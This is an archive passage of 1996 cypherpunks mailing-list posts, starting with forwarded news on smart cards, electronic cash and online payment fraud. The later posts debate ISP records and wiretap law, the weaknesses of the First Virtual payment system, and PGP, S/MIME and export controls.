VeriFone, Inc., Monday announced plans to bring the convenience of a bank
automatic teller machine into the homes of millions of consumers around the
world, enabling them to replace cash and access dozens of personal services
anytime, anywhere, using telephones, televisions, personal computers and other
low-cost devices and information appliances.Announced Monday at the ABA Bank
Card Conference, VeriFone unveiled plans to introduce a low-cost, palm-sized,
smart card reader/writer called the Personal ATM (P-ATM). The P-ATM will
connect to any standard telephone line, allowing consumers to interact with
their bank account to download cash,' securely and conveniently in the privacy
of the home or office.

In addition, leveraging VeriFone's leadership in Internet commerce, the P-ATM
will also interface with the VeriFone vWallet, and any stored-value card
scheme, enabling consumers to make purchases over the Internet, download funds
from their bank onto their smart card, transfer funds between accounts, and
perform on-line transactions between consumers and merchants. VeriFone also
revealed the development of the VeriSmart System architecture, which is
expected to accelerate consumer adoption of smart card applications. The
VeriSmart System will integrate a low-cost personal ATM device, a powerful set
of software applications that lets consumers securely interact with any
provider offering smart card services, and a comprehensive package of support
services.

Applications might include the ability to download electronic cash from their
bank, instantly receive rewards from loyalty programs, or provide selected
healthcare information to their doctor or pharmacist.

Six leading technology companies -- CIDCO, Gemplus, Key Tronic, Mondex
International, Scientific Atlanta and WebTV Networks, Inc. -- have announced
their support for VeriSmart and plan to work with VeriFone to develop further
technologies around the system.

"We are taking an aggressive role in developing the infrastructure for smart
card applications with our plans to introduce the Personal ATM and the
VeriSmart System," said Hatim Tyabji, chairman, president and CEO of VeriFone.

"VeriSmart will be the first technology that is card-scheme and hardware-device
independent, uniting all the elements in a truly end-to-end solution. We plan
to actively layer VeriSmart technology into our merchant point-of-sale
terminals and Omnihost client-server systems, to create solutions that bridge
all VeriFone markets worldwide. This action unveils the third element in our
three pronged strategy -- traditional debit/credit business, Internet commerce
and now consumer smart card technologies -- expanding VeriFone's leadership in
secure payments technologies worldwide."

In addition, American Express, GTE, Hewlett-Packard Company, MasterCard, NIPSCO
Industries, Inc., Sparbanken Bank (BABS), Sears Payment Systems (SPS), and
Wells Fargo have all announced support of the VeriSmart System.

The VeriSmart System is being designed to electronically link consumers to
their banks, telephone and utility companies, retail merchants and other
personal services. Using any one of a variety of smart card-ready devices, such
as the Personal ATM, telephone, PC, or set-top-box, a consumer will access
numerous personal services and interact with multiple stored-value card
schemes, loyalty programs, identification, and health care information.

The VeriSmart System will provide end-to-end security for all communications
between the access device and the smart card applications on the VeriSmart
server, ensuring data integrity of financial transactions and other
confidential information.

"This is the beginning of a new era for smart card applications," said Tom
Kilcoyne, general manager of VeriFone's Consumer Systems Division.

"The industry has been waiting for a compelling, cost-effective solution that
enables financial institutions, and a broad range of consumer service
providers, to move aggressively to build smart card applications. Endorsement
in the consumer market from these respected companies, combined with VeriFone's
global leadership position and expertise in the secure payment transaction
market, supports our belief in VeriSmart as a powerful system that can
accelerate development of the market for smart cards worldwide."

Wide Industry Support VeriFone's Consumer Systems Division's effort to enhance
the market for smart cards is drawing the support of consumer market leaders
that will contribute in pivotal areas of the system.

CIDCO Inc., the world's leading producer of subscriber terminal equipment that
supports intelligent network services being offered by telephone operating
companies, has formed an alliance with VeriFone to incorporate VeriSmart
technology into its products and to work with VeriFone on future projects.

"CIDCO is excited to be collaborating with VeriFone in the explosive consumer
smart card market," said Paul Locklin, CIDCO president and CEO. "The VeriSmart
system brings a strong added value to the products we market to our regional
Bell operating company customers." "VeriFone and Gemplus have had a close and
long-standing relationship over the years and we are proud to be part of this
latest breakthrough solution," said Marc Lassus, Gemplus CEO. "As a market
leader, our strategy has been to partner with companies that enable us to offer
the best-of-breed solutions, and our participation in VeriSmart extends this
strategy to the consumer market for smart cards."

"As consumers become more accepting of smart cards, initiatives like VeriSmart
will make it easier for banks and other institutions to introduce new products
and services that provide greater choice and convenience," said Ruann F. Ernst,
general manager of HP's Financial Services Business Unit.


Associated Press: Tuesday, October 8, 1996

Bankers Hope to Control 'Electronic Cash'

By E. SCOTT RECKARD

The largest organization of U.S. banks wants "smart cards" and "electronic
cash" limited to the banking industry.

The American Bankers Association, in its first official position on how
electronic cash should evolve, says such "stored-value" cards should be issued
only by regulated institutions with direct access to Federal Reserve payment
services -- namely banks, thrifts and credit unions.

The bankers' recommendation comes as several software companies are also
jockeying to provide payment systems over the Internet.

At a convention here, the bankers trade group warned that users of prepaid
phone cards have been ripped off by fly-by-night issuers. The same could happen
in storing funds for general use on plastic cards like credit cards or in
computers, the bankers said in issuing their report Sunday.

"If a nonbank issuer of stored value fails, consumers could be left holding the
bag - an empty bag," said James M. Culbertson, president for the past year of
the ABA and chairman of First National Bank in Asheboro, N.C.

The bankers' group acknowledged that some day computer companies may get into
the business of electronic cash. But if that happens, banks want the computer
companies to be subject to the same regulatory scrutiny that applies to banks
and thrifts.

While seeking exclusive rights to smart cards and their ilk, banks have
resisted the idea that conventional bank regulations should apply to electronic
cash. They oppose a proposal to apply the Federal Reserve's "Regulation E" to
stored-value cards. That regulation requires banks to offer written
confirmations of ATM transactions. Bankers say such a requirement would make
stored-value cards too expensive to issue.

And in pilot projects, banks have not treated the smart cards as deposits that
are insured by the Federal Deposit Insurance Corp. That means the consumer does
not earn interest on the unused cash backing up the card and the banks do not
have to set aside reserves as they would for a conventional deposit.

A smart card has a computer chip that stores information, including how much
the consumer has deposited. As a purchase is made, the amount is automatically
deducted from the balance in the card's memory.

In the future, consumers will be able to transfer cash to smart cards from
their home computers or at an automatic teller machine at a bank. Electronic
money is also being tested to pay for purchases over the Internet.

The move away from paper-based transactions has been a boon in many ways for
banks. The replacement of manual check-processing by electronically stored
images of the checks has probably paid off more for banks than any other
high-tech innovation, bank technology consultant Charles O. Hinely said in an
interview.

But banks could be pushed out of the payment system altogether if they don't
quickly get into computerized services and transactions, said Don Tapscott,
author of "The Digital Economy."

"If you don't, you're basically toast, and punishment is swift," he told the
bankers.

The trade group's new president, Walter A. Dods Jr., said he would work to
improve the image of bankers, whom he described as unfairly maligned despite
the financial support and considerable charity work they provide their
communities.

"But what do we get in return? We get legislation to limit ATM fees. We get a
reader telling Business Week recently that 'banks are just sucking us dry,"'
said Dods, the chairman of First Hawaiian Bank.


Washington Post: Wednesday, October 9, 1996

AT&T Adds On-Line Card Protection

By David S. Hilzenrath

When it comes to using credit cards on-line, many Internet businesses say their
biggest fear is fear itself.

Citing consumer concerns about the security of credit-card numbers as an
impediment to on-line commerce, two industry powerhouses have introduced
guarantees in an effort to overcome what they call unwarranted anxieties.

AT&T Corp. Tuesday said it would indemnify holders of its own credit card
against fraud when they use AT&T security software to shop at World Wide Web
sites that AT&T maintains for its business clients. That means AT&T would
assume responsibility for the customer's usual $50 deductible.

America Online Inc. said last month that it would assume responsibility for the
deductible when subscribers shop at on-line retailers that have been certified
as meeting its own customer-service standards. That would include about 50 of
the more than 250 merchants on-line with AOL, which only recently began the
evaluation process, said Michael Minigan, vice president of marketing for AOL's
interactive-marketing unit.

``We think that this is a way to jump-start the industry for both businesses
and consumers,'' said Kathleen Earley, vice president of AT&T's EasyCommerce
Services for businesses.

Through the power of the AT&T name and the security guarantee, ``we can help
customers overcome any concerns that they may have,'' Earley said.

AT&T introduced a different guarantee in March, promising that holders of its
Universal Card who also use AT&T as their on-ramp to the Internet would not be
held liable if their credit cards were compromised anywhere in cyberspace.

AT&T said it didn't think the guarantee would cost it much money because the
risk of a security breach is so small.

Many analysts and retailers agree that the burgeoning business of electronic
commerce is battling a perception problem. Concerns about hackers stealing
credit-card numbers on-line have spawned a new industry of companies dedicated
to making on-line transactions secure through the use of encryption.

``There's still a reluctance to use credit cards on-line,'' said David Simons,
managing director of Digital Video Investments, which studies the Internet for
institutional investors.

``It's irrational because there's probably a greater chance of theft or fraud
by giving your credit card out to an individual on an 800 number or ... the
old-fashioned way, over the counter.''

``This is strictly a perception issue,'' said Jeff Bezos, founder and chief
executive of Amazon.Com, an Internet-based bookstore that handles thousands of
sales a day.

``It's so much easier to go through a trash can or dumpster and get credit-card
numbers than it is to break the encryption schemes that are used on the
Internet.''

Still, Bezos said there is evidence that perceptions are changing. When
Amazon.Com opened for business 15 months ago, about half of its customers opted
to provide their credit-card numbers over the phone instead of over the
Internet. Now, 85 percent complete the transactions on-line, Bezos said.


AP Online: Tuesday, October 8, 1996

Bankers Shrug Off Cybertalk

BY E. SCOTT RECKARD

HONOLULU-- Go high-tech or wither, speakers as auspicious as Federal Reserve
Chairman Alan Greenspan told the 1,100-strong American Bankers Association
convention.

''If you don't, you're basically toast, and punishment is swift,'' agreed
convention speaker Don Tapscott, author of ''The Digital Economy.''

You might think conventioneers from the largest organization of U.S. banks
would all be rushing to be first in online banking, computerized marketing to
customers, and other services and automated processes.

You would be wrong, especially at smaller banks, where many seem content to
take a more relaxed approach.

Louis Prichard, president of Farmers National Bank of Danville, Ky., is
computer literate. He rose at 5 a.m. Hawaii time Monday to e-mail colleagues
and check the bank's latest financial picture via his laptop. Farmers has a

World Wide Web site with information about services and rates.

But home and online banking are still being studied by the four-branch, $190
million assets bank, and Prichard says that while Tapscott glossed over
computer security concerns, his customers worry about them.

He wants other banks to solve the start-up problems before he wades in. ''We're
like water skiers: We'll let someone else cut through the waves,'' he says.
''We'll ride along, not far behind.'' Far fewer than half the bank officials in
a huge ballroom at the Hilton Hawaiian Village here held their hands up when
Tapscott asked if they had tried the Internet. Some, like Harold R. Pehlke,
never use computers and are downright hostile to the idea.

Pehlke, 57, chief executive of Republic Bank of Chicago, sat through one of
many small-group sessions on new technology, then announced to the consultant
making the presentation: ''You have convinced me to retire in three years.''

''I wasn't sure I was going to do it, but after listening to you I am.''

Even featured speakers older ones, anyway shared similar views.

William Seidman, head of the Federal Deposit Insurance Corp. under presidents
Reagan and Ford, said he had listened to Tapscott's presentation, ''and my
immediate reaction was, 'Thank God I'm old.'''

On reflection, though, Seidman said he realized that most bank depositors were
probably in no particular rush for high-tech banking.

''Don't panic,'' he told the bankers. ''It'll take plenty of time before your
average customer gets there.''

That sounded good to Gib S. Nichols, a director of the Flathead Bank of
Bigfork, Mont.

''Our customers will let us know when it's time,'' he said.

Seidman, who ran the Resolution Trust Corp. when it began selling off the
wreckage of the 1980s savings and loan debacle, said the now flourishing bank
industry had better watch for risks as well as find new high-tech ways to
market services. Many banks ''are reaching for loans today,'' he said.

''When the going gets tough, the tough get out of the way and let someone else
do the dying,'' he said.

''We used to say as regulators, 'When the tide goes out you'll see who's
swimming without a bathing suit.' Those of you who feel the tide better look
down.''


News Release (NationsBank):Tuesday, October 8, 1996

NationsBank Official Partner of NCL's Internet Fraud Watch

NationsBank (NYSE: NB) is joining the National Consumers League's battle to
ensure the safety and security of online commerce. Through a $100,000 grant,
NationsBank is becoming the exclusive bank sponsor of NCL's Internet Fraud
Watch.

Internet Fraud Watch, launched in February by the League and operated from its
National Fraud Information Center, is a first-of-its-kind program for
monitoring, reporting and preventing fraud on the Internet. NCL shares Internet
Fraud Watch data with local, state, and federal agencies, including the Federal
Trade Commission and state attorneys general, as well as international law
enforcement groups.

"Internet Fraud Watch is a resource that consumers can use to get educated on
the Internet," said NCL President Linda F. Golodner. "Since our launch in
February, our Web site alone has received more than 300,000 visits from
consumers and averaged 25,000 hits a week. We have helped consumers as well as
law enforcement officials keep cyberfraud in check."

The NationsBank grant will significantly expand the Internet Fraud Watch
consumer education and protection programs, according to Golodner.

With plans to offer Web-banking in mid-1997 and more than 120,000 customers
already using its PC banking product, NationsBank ranks online security as a
top priority, according to NationsBank President Ken Lewis.

"NationsBank is happy to help NCL broaden its fraud education and prevention
efforts," said Lewis. "The Internet's growing popularity and potential for
commerce make it a vitally important avenue for American business. It's equally
important that consumers know the Internet is a safe and secure place to do
business."

The Federal Trade Commission rigorously monitors the Internet. The FTC recently
cracked down on a pyramid scheme it believed had bilked consumers of more than
$6 million. It also took action against several firms that marketed business
opportunities by using deceptive claims and false earnings reports.

"Consumers who suspect a scam on the Internet have critical information that
can be used by law enforcement agencies to track down and stop potential frauds
before more consumers are victimized," said Jodie Bernstein, director of the
FTC's Bureau of Consumer Protection. "The Internet Fraud Watch program gives
consumers an easy and cost-free way of providing this information, and it has
been a major help to the FTC in identifying particular scams in their infancy."

National Consumers League advisors field calls about alleged incidents of
online fraud, direct callers to local resources and report the information to
state and federal enforcement authorities. Enforcement agencies use the data to
help shut down cybercrimes and boiler rooms. Work-at-home schemes are among the
top-five scams currently operating online. (NCL Top Five Internet Scams will be
available on Wednesday, Oct. 9.)

Consumers can reach NCL's Internet Fraud Watch by phone through the National
Fraud Information Center at (800) 867-7060, or visit the home page at
http://www.fraud.org . They may also send e-mail messages to
nfic@internetmci.com.


Financial Times: Wednesday, October 9, 1996

Smartcard Trials Extended

The race to replace notes and coins with electronic cash hots up this month as
the Mondex consortium extends trials of its smartcards. The group, which
includes British Telecom, Midland Bank and NatWest Bank, is issuing students at
York and Exeter universities with the cards, which contain a microchip that can
be loaded with electronic money from automatic teller machines and home
telephones.

The cards are "swiped" through retailers' tills to deduct payment for
purchases. Users do not have to sign an authorisation slip as they do with
direct debit and credit cards. Electronic money saves banks and retailers the
considerable costs of handling physical cash. But so far consumers testing
Mondex smartcards in the UK have not received a share of this saving. Mondex is
well ahead of its main rival in the UK, VisaCash, whose backers include
Barclays and Lloyds Bank. It could be a year before VisaCash starts its own
trials; Mondex could be offering its cards to the public by then.
Jonathan Guthrie


AP Worldstream: Tuesday, October 8, 1996

Banker Sentenced to Death for Fraud

HANOI, Vietnam-- A Vietnamese private bank executive has been sentenced to
death after a court in southern Vietnam found him guilty of financial fraud and
stealing funds from accounts, state-run media reported Tuesday.

Nguyen Van Son, deputy general director of Gia Dinh Joint Stock Commercial
Bank, will face a firing squad for his crimes, said the Communist Party
newspaper Nhan Dan, or The People.

Ho Chi Minh City's People's Court convicted Son of fraud linked to the private
bank he and his wife, Thai Kim Lieng, established in 1992. The court said Son
stole about $4.5 million from the bank's accounts.

Unable to collect the necessary capital to qualify for a bank license, Son and
his wife forged several documents claiming they had about $800,000 worth of
funds from 17 shareholders, court records said.

When the State Bank of Vietnam granted the couple a banking license in 1992,
they began siphoning off money from newly opened savings and other accounts.

At the time, the bank had more than $6.5 million worth of accounts, the
newspaper said. The bank also had collected substantial gold reserves.

Son continued to forge credit documents over several years to increase the
bank's financial standing, the report said.

A police investigation in 1994 led to the arrests of Son, his wife and five
other bank associates.

Lieng and bank director Nguyen Le Tue also stood trial with Son. Both were
sentenced to life in prison.

Four other bank executives were sent to prison for terms ranging from 3 to 20
years. Although a number of banking scandals have been reported in Vietnam
since Hanoi began shifting toward a market economy. This latest case is the
largest of its kind and marks the first time a bank executive has been
sentenced to death for his crimes.

Nhan Dan described Son's crimes as ''organized acts that cause extremely
serious consequences and pose dangers to society.''

In addition to the death and prison sentences, the court ruled that the
culprits must repay money taken from the bank.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 10 Oct 1996 21:30:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <7LNFVD15w165w@bwalk.dm.com>
Message-ID: <ko0LVD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


A clarification regarding something I wrote a few days ago:

dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:
> Another possibility is to issue a charge card (payable in full at the end of
> the month, getting revenue from the annual fee), rather than a credit card, s
> it could claim not to be subject to certain Federal Reserve's regulations tha
> have to do with credit card disputes. But then it probably can't be Visa/MC a
> can't use their clearginhouses.

A charge card (like the original AmEx, not like Optima) is not the same as
a debit card. I have a debit card, tied to my checking account, and using
mastercard's clearinghouse. To issue a debit card, the organization needs
to keep checking accounts. Even if it doesn't pay interest, doesn't make
commercial loans, etc, it still would be subject to weird Fed regulations
and probably couldn't maintain anonimity.

But the lack of a dispite resolution mechanism is really the killer.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 11 Oct 1996 01:07:25 -0700 (PDT)
To: coderpunks@toad.com
Subject: BAY AREA CYPHERPUNKS SATURDAY 10/12 TRESSIDER HALL STANFORD
Message-ID: <199610110806.BAA18615@dfw-ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


There will be a San Francisco Bay Area Cypherpunks meeting on Saturday 10/12 
at Stanford University.  The meeting location will be the tables outside
Tressider Hall, where we've met for several previous meetings.
The canonical time is noon for lunch and milling around, and 1pm
for organized program.

Hugh Daniel will be organizing the program, and will be demonstrating
how to install the SWAN encrypting firewall system that John Gilmore
talked about at the September meeting.

Maps of Stanford are available on the web under www.stanford.edu.
For the MIME-equipped, I've attached a GIF that has the meeting
area outside Tressider marked.  Ample parking is available in the
parking lot between Mayfield Ave. and Lagunita.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott McGuire <svmcguir@syr.edu> (by way of Timothy C. May)
Date: Fri, 11 Oct 1996 02:07:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Forward Privacy" for ISPs and Customers
Message-ID: <v03007803ae83cf1f6425@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


Tim said
> IANAL, and I have been skimmming over most of the Bell v. Unicorn v. Nuri
> debates about the legality of wiretapping, but something jumped out at me:
>
... stuff deleted ...
>
> I agree that ISPs look a lot like phone companies for the purposes of
> regulations and wiretaps. My ISP sells me some connectivity, sends me a
> bill, etc.
>

It seems to me that they are actually selling two seperate things.  One is
connectivity the other storage.  The storage might have a different legal
status than the connectivity.  So, is email part of the connectivity or the
storage?  What is the legal status of phone company provided voice mail?  This
seems pretty close to email.

> Thus, if it is constitutionally OK (a technical term) for courts to order
> phone logs to be turned over to law enforcement, why not logs of e-mail? Or
> logs of Web sites visited, for example? I see no basis for a special
> distinction. Records are records, and businesses routinely have to turn
> over various records under court order.
>
> However, there are certain things my phone company does *not* do. They
> don't keep _copies_ (recordings) of my phone conversations. This means a
> court order can't yield copies of past conversations. They also don't track
> incoming phone calls to me. (I don't believe such records of incoming phone
> calls are kept; maybe I'm wrong. Certainly with Caller ID, storing incoming
> phone numbers is possible....I just don't think local or regional phone
> companies care about such records, and hence don't bother to accumulate
> them.)
>
> Now, should the phone company keep such records, they would be accessible
> via court order.
>
> My point? ISPs are currently in a position to turn over *far* more
> information than phone companies are able to turn over. It's as if the
> phone companies kept audio recordings of all conversations, without even
> the need for law enforcement to do a wiretap or pen register or whatnot. It
> would be trivial for law enforcement to say: "Phone Company, here's a
> subpoena/court order for the last 6 months of phone conversations Tim May
> has had. Please ship the tapes via FedEx."
>

Do we know that if phone companies kept recordings of your conversations they
would have the same legal status as the records that they already keep?

> This makes the ISP case a bit different. Not legally, but technologically.
>
> There are some fixes.
>
> Something ISPs could do--and may do if there is sufficient customer
> pressure--is to adopt a policy of "forward secrecy" (to slightly abuse this
> technical term). That is, to have an explicit policy--implemented in the
> software--of _really_ deleting the back messages once a customer downloads
> them to his site. This means that _backups_ must be done in a careful
> manner, such that even the backup tapes or disks are affected by a removal.
>
> (Recall that Ollie North thought he had deleted his incriminating White
> House PROFS messsages, but that they were faithfully preserved on backup
> tapes, and could be retrieved.)
>
> My Eudora Pro mail programs sucks down messages from my ISP and, as yours
> probably does, tells the ISPs mail server to delete it upon downloading. An
> option for users could be something like "Don't make longterm backups of my
> account, and leave no copies whatsoever once I have downloaded my
> messages."
>
> This would make the job of a law enforcement or TLA a lot more difficult
> than it is now, where the e-mail and logs are ready to be handed over on a
> silver platter, all nicely accumulated and human-readable.
>

It would be good to get ISP's to work this way regardless of the law.  Its
better for the data not to exist than have it legally hard to obtain.

> Back to the legal issue. Perhaps the Digital Telephony Act will be
> interpreted to require ISPs to make their systems "tappable," possibly by
> adding message logging. possibly just by offering access to the T1s and T3s
> only ("OK, Feds, here's where the T3 enters the building...be careful you
> don't cut the core, OK?").
>
> But if no logs and backup tapes of mail are kept, at least the job of
> gaining access to communications is made more difficult.
>
> And, I'm sure the lawyers will agree, while ISPs may be treated essentially
> the same as telephone companies, absolutely *nothing* requires either to
> keep specific kinds of account records (*), to "know their customer" (a la
> banking laws, supposedly), or to record all traffic.
>
> (* Prepaid phone cards, paid for in cash, and payphones, tell us that True
> Names are not needed with the phone companies. And so on.)
>
> We don't have to make it easy for them.
>
> --Tim May
>
>
> "The government announcement is disastrous," said Jim Bidzos,.."We warned
> IBM that the National Security Agency would try to twist their
> technology." [NYT, 1996-10-02]
> We got computers, we're tapping phone lines, I know that that ain't
> allowed.
---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
>
>

--------------------
Scott V. McGuire <svmcguir@syr.edu>
PGP key available at http://web.syr.edu/~svmcguir
Key fingerprint = 86 B1 10 3F 4E 48 75 0E  96 9B 1E 52 8B B1 26 05






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Thu, 10 Oct 1996 17:55:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: What are the flaws with FV payment system?
In-Reply-To: <Pine.SUN.3.91.961010103809.463D-100000@monroe.lib.mi.us>
Message-ID: <199610110055.CAA20833@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Kip DeGraaf <kip@monroe.lib.mi.us> wrote:
> I only received this an hour ago.  I would very much like to attend, but
> can't put my fingers on the detailed analysis of FV's flaws in their
> system, which I would like to bring up in person at this seminar.
> 
> Could someone please point me in the right direction?


You can start with http://www.c2.org/nofv/


Basically, if you can get access to someone's email, then you can
defraud the system.  FV protects themselves by holding payments for
90 days before they pay the merchant.  It's an unsecure system, with
no encryption.  FV will accept no responsibility for this, and when
people cheat, the merchant gets screwed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Fri, 11 Oct 1996 03:39:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: legality of wiretapping: a "key" distinction
Message-ID: <199610111039.EAA01575@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

...

>Ironically he said it, despite the fact that wiretapping is comparatively 
>rare.  Perjury, "drop guns," faking and planting evidence, accepting bribes, 
>strongarming suspects, and similar techniques are probably far more commonly 
>used than wiretapping ever was, but I don't see Unicorn describing those as 
>"firmly entrenched" even though that would be an accurate characterization.

Donuts and coffee are firmly entrenched in law enforcement, too. Must Unicorn say _all_ obvious things in his (futile, but increasingly humorous) quixotic quest for your continuing (and free) legal education? Say it ain't so..
me










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Geoff Klein <geoff@commtouch.co.il>
Date: Fri, 11 Oct 1996 06:01:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Why not PGP?
Message-ID: <199610111301.GAA02238@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: liberty@gate.net, rollo@artvark.com, cypherpunks@toad.com
Date: Fri Oct 11 15:08:41 1996

On 10 Octt Rollo Silver wrote:

> 2. Suppose someone writes a program Z that has no expicit crypto code
>  in it, but has hooks for installing one or another version of PGP. Given
>  a copy of Z, someone in this country could install PGP he got from MIT,
>  whereas someone in Europe could install the international version.

Pronto Secure is an e-mail client which pretty much fits Z.

>  Would export of Z violate ITAR restrictions?

Good question.
Anyone know if exporting Z has been tested ?

Commtouch does not currently export Pronto Secure from the US :)

- ------------------------------------------------------------------------
Geoff Klein,     Pronto Secure Product Manager
http://www.commtouch.com, Tel: 972-9-963445 (ext 130), Fax: 972-9-961053
For my PGP public key send mail with subject: Get Key
- ------------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMl44zELv5OMYFK1FAQES/AQApuvGj1DFHOhSkUVJ4tyaQpHUYapC8cDA
I3HOd9Ic5hS4u/NCHFbHPlvbe+kFN8jBDlwtLcyOtbFiWcfOTJJcvJAWQgSadjjf
zvdfxFs5DXzIIepijQoGBSOtcPKn8F4UtxQ47G/7SViEUob1OkCrFUxmOtpkuFDh
5Yd720FJEnI=
=NdPu
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Geoff Klein <geoff@commtouch.co.il>
Date: Fri, 11 Oct 1996 06:01:48 -0700 (PDT)
To: rollo@artvark.com
Subject: Re: Why not PGP?
Message-ID: <199610111301.GAA02245@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: froomkin@law.miami.edu, rollo@artvark.com, cypherpunks@toad.com
Date: Fri Oct 11 15:08:50 1996
On 10 Oct Michael Froomkin wrote:

>> 2. Suppose someone writes a program Z that has no expicit crypto code
>> in it, but has hooks for installing one or another version of PGP. Given 
>> a copy of Z, someone in this country could install PGP he got from MIT,
>> whereas someone in Europe could install the international version.
>> Would export of Z violate ITAR restrictions?
> 
> Yes, but these are currently being challenged in 3 separate court
> actions.

Can you post a reference to more info about these actions please.


- ------------------------------------------------------------------------
Geoff Klein,     Pronto Secure Product Manager
http://www.commtouch.com, Tel: 972-9-963445 (ext 130), Fax: 972-9-961053
For my PGP public key send mail with subject: Get Key
- ------------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMl441ELv5OMYFK1FAQF8tQQAipKnURVdvOMRiOdKNPXjDO13ZL7qyXqy
s3Bk6THTWxMLGhmuHc566NdZAMjQJIRFPKjf/0OJdiu9XZYPAGZjo42ry435hG0S
4WqfN19MIhVN0oLpCSTz/cUFQFBGh916icPjnp43/2fx+rqCfcF87MCicBUjukFd
X34M9N91cLs=
=PNAM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Geoff Klein <geoff@commtouch.co.il>
Date: Fri, 11 Oct 1996 06:01:52 -0700 (PDT)
To: raph@cs.berkeley.edu
Subject: Re: pgp, edi, s/mime
Message-ID: <199610111301.GAA02247@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: andrew_loewenstern@il.us.swissbank.com, raph@cs.berkeley.edu,
 cypherpunks@toad.com
Date: Fri Oct 11 15:08:58 1996

> Raph Levien writes:
> >  In sum, S/MIME leaves PGP in the dust, both techically and as
> >  a market force.

Disagree:

1. Technical superiority of S/MIME over PGP is arguable.

2. It will be some time (if ever) before you will be able to communicate 
securely using S/MIME across US borders.


- ------------------------------------------------------------------------
Geoff Klein,     Pronto Secure Product Manager
http://www.commtouch.com, Tel: 972-9-963445 (ext 130), Fax: 972-9-961053
For my PGP public key send mail with subject: Get Key
- ------------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMl443ULv5OMYFK1FAQEWmQQAljOoIDcxoaOdOHWW9EurIsMsGt85Wmkn
65slX58eONq3LdkLY+NEEIG/bpIZIzcy0wQO7aWX2qQdJRYBSBSmHzDxb4A07cJM
AN3c5q3pRZzB27iKJHlsPtoauvRE+O0LAwTRz+0zhNfAwsDcvttfYXTE8AycwtoY
DCuPGrR1s6g=
=/otj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 11 Oct 1996 06:13:05 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: PLEDGES
In-Reply-To: <Pine.SUN.3.91.961010152846.10434D-100000@crl.crl.com>
Message-ID: <Pine.SUN.3.91.961011060921.20314C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996, Sandy Sandfort wrote:

> In the likely circumstance that we get more money pledged than is 
> required to fete Dimitri, I'll return the excess to donors on a
> pro rata basis.  For now, though, I need more pledges.  Thanks.

I'm in for $25, provided that reasonably detailed reports of the meeting
get sent to the list for those of us who won't be there in person. And if
there's time and I go to it, I can take a collection up at a DC
cypherpunks meeting. 

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 11 Oct 1996 06:19:15 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: RE: legality of wiretapping: a "key" distinction
In-Reply-To: <199610101654.JAA24509@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.961011061545.20314D-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996, jim bell wrote:

> Unicorn's response was inadvertently hilarious.  He says that wiretapping is 
> "firmly entrenched" in law-enforcement, but the truth is that it was 
